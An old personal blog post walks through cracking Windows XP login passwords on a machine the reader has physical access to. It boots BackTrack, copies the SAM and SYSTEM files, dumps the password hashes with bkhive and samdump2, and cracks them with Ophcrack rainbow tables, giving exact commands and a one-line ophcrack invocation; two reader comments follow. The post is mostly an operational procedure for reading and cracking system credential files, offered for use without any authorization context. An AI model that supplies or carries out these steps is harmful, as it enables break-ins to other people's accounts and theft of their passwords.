Saturday, 11 April 2009

Cracking Windows login passwords

All of this is old news, but still new and fascinating to me ;) hence the detailed post !

Scenario is that you do not have access to windows, you need the login and password.
(and thus of course a 2nd pc to do the cracking ;) )

The tools used were ;
* BackTrack 3 Final live-usb
* Ophcrack (using the XP special rainbow tables)

The hack / crack is based on having physical access to the machine in question, and assuming it is running Windows XP.
Basically the sequence of events is as follows -->
* Booting up with the BackTrack live-usb/cd;
* Copy the files from the windows system with logins and passwords and keys to extract them;
* Extract the hashes from the SAM file;
* Crack the hashes using OPHcrack

After booting up BT3 and opening up a shell type the 'df' command to see which drives are mounted ;

In this case sda1 and sda2 are on the laptop, the sda2 partition has Windows on it.
sdb1 is my flashdrive running BT3 and sdc is my extra flashdrive for saving the password hashes later as I will crack these on my other PC.

Now to head over to the directory in the Windows partition to find and copy the files we need to work with, which are the SAM file and the SYSTEM file.
cd /mnt/sda2/WINDOWS/system32/config/

Now to copy the SAM and SYSTEM file to the flashdrive.
cp SAM /mnt/sdc/
cp SYSTEM /mnt/sdc/

Now we have the the files we need, we switch to the folder where we copied the files and use the tool 'bkhive' to extract the information necessary to dump the hashes from the SAM file.
cd /mnt/sdc/
bkhive system key

Now we can use the key to dump the hashes from the SAM file using the tool 'samdump2'.
samdump2 sam key
to copy the hashes to a text file for cracking later;
samdump2 sam key > /mnt/sdc/hashes.txt

So now we have a list of users and the hashes for their passwords in the file 'hashes.txt' !

Stage 2.. cracking the hashes with Ophcrack..

Ophcrack is a free windows password cracker that uses rainbow tables (pre-computed password hashes) it can be run off a live-cd as well, however I found the actual installed program to better fit my purpose.

There are a couple of free rainbow tables free for download, these will normally grab the easy passwords, however I had the most success with the the 'XP special' rainbow tables.
These included more characters and although it obviously takes longer to crunch the numbers, the results are fantastic.

So, assuming Ophcrack is installed on your system and that you have downloaded at least the 'XP free small' and the 'XP free fast' tables ;

Fire up Ophcrack, click on the 'Tables' icon and install the tables by browsing to the directory where they are located. Click OK and the screen should look something like the below.

Next click on the 'Load' icon and choose the 'PWDUMP file' and browse to your 'hashes.txt' file that was made in the previous step with BT3.

Then click on the 'Crack' icon and let Ophcrack do its thing !
It is a CPU intensive process and took my lowly PC over 4min to complete..
Without success using the XP free fast tables..

Using the XP special tables however, it takes a lot longer, but with MUCH better results ;

So there you have it, the longest part of doing the above will be the downloading of the tools and tables ;)

An optimized way to do the above is to get an 8Gig thumb drive (the XP special tables are over 7Gig, whereas the tables included on the Ophcrack live-cd are under 400mb and contain a lot less possible passwords), make it a bootable Ophcrack usb drive and replace the tables in the Opcrack/tables directory with the XP special tables.
Doing this enabled me to do the above in one step by booting into the system with the Opcrack live-usb and carry out the windows password cracks directly.
This reduced the time necessary to do the above down to under 11 min !
(This in no small part due to amount of RAM, my desktop only has 2gig whereas my laptop has 3gig RAM, the more the merrier!)


Well goes to show that research is still your best friend !

There is an Ophcrack module available ophcrack-3.0.lzm which can be downloaded from the great french blog and then placed in your BackTrack3, modules folder.

This way if you have a large flashdrive, you can boot in BT3, run the ophcrack module, point to your rainbow tables, and off you go !

Assuming you have downloaded the above ophcrack module and have correctly placed in your modules folder, proceed as follows;

> Boot up in BT3F
> Open a shell and type ophcrack for options;

Then type in the code;
ophcrack -g -d /mnt/sdb1/OPHcrack/ -t /mnt/sdb1/OPHcrack/XP_Special/ -w /mnt/sda2/WINDOWS/system32/config/
(In my case the tables are in a folder called OPHcrack on my usb drive from which BT is running, and windows is on my sda2, really though just follow the code instructions as above and you can't go wrong, but remember that the path is case sensitive !)

So as you can see the whole process for the cracking took about 19 minutes to chunk through around 7gigs worth of tables.
Not that bad !


  1. The linked site (which i was also linked to from elsewhere) does not appear to be hosting the file anymore, would it be possible for you to host it for us?

  2. Ophcrack works out of the box in backtrack 4,
    so I would upgrade to backtrack 4 and give ophcrack a whirl.


Google Analytics Alternative